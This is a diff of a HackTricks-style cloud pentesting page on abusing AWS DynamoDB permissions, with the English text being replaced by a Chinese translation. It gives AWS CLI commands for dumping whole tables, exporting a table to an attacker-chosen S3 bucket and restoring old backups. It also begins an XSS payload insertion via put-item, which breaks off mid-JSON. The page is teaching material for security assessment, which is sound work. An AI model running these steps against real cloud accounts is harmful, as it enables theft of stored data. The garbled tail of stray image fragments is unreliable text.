-**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request.
+**与之前的权限类似,** 这项权限允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值。它允许使用[比较子集](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html),但唯一允许与主键(必须出现)进行的比较是 "EQ",因此您无法使用比较在请求中获取整个数据库。
{{#tabs }}
{{#tab name="json file" }}
-
```bash
aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json
- // With a.json
- {
+// With a.json
+{
"Id" : {
- "ComparisonOperator":"EQ",
- "AttributeValueList": [ {"N": "205"} ]
- }
+"ComparisonOperator":"EQ",
+"AttributeValueList": [ {"N": "205"} ]
+}
}
```
-
{{#endtab }}
{{#tab name="inline" }}
-
```bash
aws dynamodb query \
- --table-name TargetTable \
- --key-condition-expression "AttributeName = :value" \
- --expression-attribute-values '{":value":{"S":"TargetValue"}}' \
- --region
+--table-name TargetTable \
+--key-condition-expression "AttributeName = :value" \
+--expression-attribute-values '{":value":{"S":"TargetValue"}}' \
+--region
```
-
{{#endtab }}
{{#endtabs }}
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**潜在影响:** 通过定位表中的敏感信息进行间接权限提升
### `dynamodb:Scan`
-You can use this permission to **dump the entire table easily**.
-
+您可以使用此权限**轻松导出整个表**。
```bash
aws dynamodb scan --table-name #Get data inside the table
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**潜在影响:** 通过在表中定位敏感信息进行间接权限提升
### `dynamodb:PartiQLSelect`
-You can use this permission to **dump the entire table easily**.
-
+您可以使用此权限来**轻松导出整个表**。
```bash
aws dynamodb execute-statement \
- --statement "SELECT * FROM ProductCatalog"
+--statement "SELECT * FROM ProductCatalog"
```
-
-This permission also allow to perform `batch-execute-statement` like:
-
+此权限还允许执行 `batch-execute-statement`,例如:
```bash
aws dynamodb batch-execute-statement \
- --statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
+--statements '[{"Statement": "SELECT * FROM ProductCatalog WHERE Id = 204"}]'
```
+但您需要指定主键及其值,因此这并不是很有用。
-but you need to specify the primary key with a value, so it isn't that useful.
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**潜在影响:** 通过在表中定位敏感信息进行间接权限提升
### `dynamodb:ExportTableToPointInTime|(dynamodb:UpdateContinuousBackups)`
-This permission will allow an attacker to **export the whole table to a S3 bucket** of his election:
-
+此权限将允许攻击者**将整个表导出到他选择的 S3 存储桶**:
```bash
aws dynamodb export-table-to-point-in-time \
- --table-arn arn:aws:dynamodb:::table/TargetTable \
- --s3-bucket \
- --s3-prefix \
- --export-time \
- --region
+--table-arn arn:aws:dynamodb:::table/TargetTable \
+--s3-bucket \
+--s3-prefix \
+--export-time \
+--region
```
-
-Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
-
+注意,要使其工作,表需要启用时间点恢复,你可以通过以下方式检查表是否启用:
```bash
aws dynamodb describe-continuous-backups \
- --table-name
+--table-name
```
-
-If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
-
+如果它没有启用,您需要**启用它**,为此您需要**`dynamodb:ExportTableToPointInTime`**权限:
```bash
aws dynamodb update-continuous-backups \
- --table-name \
- --point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
+--table-name \
+--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table
+**潜在影响:** 通过在表中定位敏感信息进行间接权限提升
### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
-With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
-
+拥有这些权限后,攻击者将能够**从备份中创建新表**(甚至可以创建备份,然后在不同的表中恢复它)。然后,凭借必要的权限,他将能够检查**信息**,这些信息**可能不再在生产**表中。
```bash
aws dynamodb restore-table-from-backup \
- --backup-arn \
- --target-table-name \
- --region
+--backup-arn \
+--target-table-name \
+--region
```
-
-**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
+**潜在影响:** 通过定位表备份中的敏感信息进行间接权限提升
### `dynamodb:PutItem`
-This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
+此权限允许用户**向表中添加新项或用新项替换现有项**。如果具有相同主键的项已经存在,**整个项将被新项替换**。如果主键不存在,将**创建**一个具有指定主键的新项。
{{#tabs }}
{{#tab name="XSS Example" }}
-
```bash
## Create new item with XSS payload
aws dynamodb put-item --table --item file://add.json
### With add.json:
{
- "Id": {
- "S": "1000"
- },
- "Name": {
- "S": "Marc"
- },
- "Description": {
- "S": "
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte).png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
 (1) (1) (1) (1) (1).png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
.png)
 (1).png)
.png)
.png)
.png)
